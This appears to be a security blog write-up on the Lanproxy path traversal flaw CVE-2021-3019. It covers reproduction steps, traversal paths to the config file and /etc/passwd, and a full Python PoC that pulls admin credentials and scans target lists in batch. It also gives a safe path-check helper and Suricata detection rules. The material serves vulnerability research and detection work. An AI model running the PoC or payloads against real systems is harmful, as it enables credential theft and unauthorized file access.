Reproducing the Lanproxy Path Traversal Vulnerability (CVE-2021-3019) and Detecting It with Suricata

0x01 Introduction to Lanproxy

Lanproxy is an intranet tunnelling tool that exposes personal computers and servers on a LAN to the public internet. It forwards TCP traffic, so it supports any protocol layered on TCP (accessing intranet websites, debugging local payment interfaces, SSH access, remote desktop, and so on).

0x02 Vulnerability Overview

This Lanproxy path traversal vulnerability (CVE-2021-3019) uses ../ sequences to bypass the path check and read arbitrary files. The directory traversal allows reading /../conf/config.properties, which exposes the credentials used for the intranet connection.
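The underlying defect is that the requested path is joined to the web root without checking where the canonical result lands. As an added illustration (not Lanproxy's own code, which is Java), this Python helper shows the check that rejects both PoC paths used in this post while still serving normal files; WEB_ROOT is an assumed example directory.

```python
import os

# Assumed example directory for illustration, not Lanproxy's real layout
WEB_ROOT = "/opt/lanproxy-example/webpages"


def resolve_static_path(web_root, request_uri):
    """Map a request URI to a file under web_root.

    Returns the canonical absolute path, or None when the resolved path
    escapes web_root. The check is done on the canonical path, so a single
    '/../' and a long '../../../..' chain are rejected alike, while a '..'
    that stays inside the root (e.g. /css/../index.html) is still allowed."""
    root = os.path.realpath(web_root)
    rel = request_uri.split("?", 1)[0].lstrip("/")   # drop query, make relative
    candidate = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for uri in ("/../conf/config.properties",
                "/../../../../../../../../../etc/passwd",
                "/css/../index.html",
                "/index.html"):
        print(uri, "->", resolve_static_path(WEB_ROOT, uri) or "rejected")
```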

0x03 Affected Versions
lanproxy 0.1

0x04 Environment Setup

(1) Download Lanproxy

https://file.nioee.com/d/2e81550ebdbd416c933f/files/?p=/proxy-server-0.1.zip

(2) Start the service
After unzipping, change into the bin directory and run ./startup.sh to start the service.

(3) Access port 8090; when the Lanproxy page loads, the environment is set up successfully (screenshot in the original post).
0x05 Vulnerability Reproduction
Request the PoC path: ../conf/config.properties


Read the /etc/passwd file:
/../../../../../../../../../etc/passwd

0x06 PoC Script

import argparse
import os
from urllib import request
from urllib import error


headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4080.0 Safari/537.36 Edg/82.0.453.0"}

def readConf(url):
    """
    Read the configuration file by default; whether it can be read
    decides whether the target is vulnerable.
    """
    config = [
        'config.server.bind',
        'config.server.port',
        'config.admin.username',
        'config.admin.password'
    ]
    path = "/../conf/config.properties"
    confUrl = url + path
    r = request.Request(confUrl, headers=headers)
    try:
        with request.urlopen(r, timeout=10) as resp:
            confContent = resp.read().decode('utf-8')
            # Only report vulnerable when every expected key is present
            for i in config:
                if i not in confContent:
                    print("[-] " + url + " is not vulnerable")
                    return 'Bye :('
            print("[+] " + url + " is vulnerable! :)")
            return confContent
    except ConnectionResetError:
        print("[-] " + url + " Connection reset by peer")
    except error.HTTPError as e:
        # e.code is an int, so format it instead of concatenating strings
        print("[-] %s %s %s" % (url, e.code, e.reason))
    except error.URLError as e:
        # URLError has no .code attribute, only .reason
        print("[-] %s %s" % (url, e.reason))
    except Exception as e:
        print("[-] " + url + " is not vulnerable (" + str(e) + ")")
    return 0

def readOtherFile(url, path):
    """
    Read an arbitrary other file
    """
    jumpSym = "/../../../../../../../../.."
    fullUrl = url + jumpSym + path
    r = request.Request(fullUrl, headers=headers)
    try:
        with request.urlopen(r, timeout=10) as resp:
            fileContent = resp.read().decode('utf-8', errors='replace')
            print(fileContent)
    except (error.HTTPError, error.URLError) as e:
        print("[-] failed to read " + path + ": " + str(e))

def run(url, path="/../conf/config.properties"):
    if not os.path.isfile(url):
        # Single target
        if 'http' not in url:
            url = 'http://' + url
        if path == "/../conf/config.properties":
            print(readConf(url))
        else:
            if readConf(url) not in [0, 'Bye :(']:
                readOtherFile(url, path)
    else:
        # Batch mode: the argument is a file with one target per line
        with open(url) as target:
            urls = target.read().splitlines()
        for u in urls:
            if not u.strip():
                continue
            if 'http' not in u:
                u = 'http://' + u
            if readConf(u) not in [0, 'Bye :(']:
                # Append every vulnerable target to success.txt
                with open("success.txt", "a+") as f:
                    f.write(u + "\n")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2021-3019 lanproxy arbitrary file read vulnerability detection POC")
    parser.add_argument('-u', '--url', type=str,
        help="test a single website")
    parser.add_argument('-r', '--read', type=str,
        help="this parameter is followed by the file name to be read, the configuration file is read by default")
    parser.add_argument('-f', '--file', type=str,
        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()

    print("""
 ######  ##     ## ########      #######    #####    #######     ##        #######    #####      ##    #######  
##    ## ##     ## ##           ##     ##  ##   ##  ##     ##  ####       ##     ##  ##   ##   ####   ##     ## 
##       ##     ## ##                  ## ##     ##        ##    ##              ## ##     ##    ##   ##     ## 
##       ##     ## ######  ##### #######  ##     ##  #######     ##  ##### #######  ##     ##    ##    ######## 
##        ##   ##  ##           ##        ##     ## ##           ##              ## ##     ##    ##          ## 
##    ##   ## ##   ##           ##         ##   ##  ##           ##       ##     ##  ##   ##     ##   ##     ## 
 ######     ###    ########     #########   #####   #########  ######      #######    #####    ######  #######  
                                                                                            Author: _0xf4n9x_
    """)

    # Dispatch on the parsed arguments instead of inspecting sys.argv positions
    if args.url:
        if args.read:
            run(args.url, args.read)
        else:
            run(args.url)
    elif args.file:
        run(args.file)
    else:
        parser.print_help()

0x07 Suricata Detection
(1) Detection rules

alert http any any -> any any (msg:"检测到[CVE-2021-3019]Lanproxy 目录遍历攻击"; flow:to_server,established; content:"|2f 2e 2e 2f|"; content:"conf|2f|config.properties"; http_uri; distance:0; content:"server.bind="; http_server_body; reference:cve,2021-3019; classtype:web-application-attack; sid:2101120301; rev:1;)

alert http any any -> any any (msg:"检测到[CVE-2021-3019]Lanproxy 文件读取"; flow:to_server,established; content:"|2f 2e 2e 2f|"; content:"etc|2f|passwd"; http_uri; content:"|2f|root"; http_server_body; content:"|2f|bin|2f|bash"; http_server_body; reference:cve,2021-3019; classtype:web-application-attack; sid:2101120302; rev:1;)
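To make explicit what the two rules above key on, here is an added offline re-implementation in Python (example code, not the post's PoC and not a Suricata component) that applies the same ordered URI checks and response-body checks to constructed request/response pairs; the HttpExchange class, the RULES table and the sample data are assumptions made for this example.

```python
from dataclasses import dataclass


@dataclass
class HttpExchange:
    uri: str   # request URI as the client sent it (raw, not normalized)
    body: str  # decoded server response body


# sid -> (substrings that must appear in order in the URI,
#         substrings that must all appear in the response body)
RULES = {
    2101120301: (("/../", "conf/config.properties"), ("server.bind=",)),
    2101120302: (("/../", "etc/passwd"), ("/root", "/bin/bash")),
}


def match_ordered(haystack, needles):
    """Emulate chained content matches with distance:0 - each needle
    must start at or after the end of the previous match."""
    pos = 0
    for needle in needles:
        idx = haystack.find(needle, pos)
        if idx < 0:
            return False
        pos = idx + len(needle)
    return True


def matching_sids(ex):
    """Return the sids of rules whose URI and body conditions both hold."""
    return [sid for sid, (uri_parts, body_parts) in RULES.items()
            if match_ordered(ex.uri, uri_parts)
            and all(part in ex.body for part in body_parts)]


# Constructed sample exchanges (not real captures; values are made up)
SAMPLES = [
    HttpExchange("/../conf/config.properties",
                 "config.server.bind=0.0.0.0\nconfig.server.port=4900\n"
                 "config.admin.username=admin\nconfig.admin.password=<placeholder>\n"),
    HttpExchange("/../../../../../../../../../etc/passwd",
                 "root:x:0:0:root:/root:/bin/bash\n"),
    # Same traversal request against a patched server: no secrets in the body, no alert
    HttpExchange("/../conf/config.properties", "404 Not Found"),
    HttpExchange("/index.html", "<html>Lanproxy</html>"),
]

if __name__ == "__main__":
    for ex in SAMPLES:
        print(ex.uri, "->", matching_sids(ex) or "no alert")
```

Because both rules also require the tell-tale strings in the server response body, a traversal attempt that the server refuses produces no alert, which keeps false positives from scanners low but means a blocked attempt is not logged by these rules.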

(2) Detection results (screenshot in the original post)
0x08 References
https://www.jianshu.com/p/6482ac354d34
https://github.com/FanqXu/CVE-2021-3019
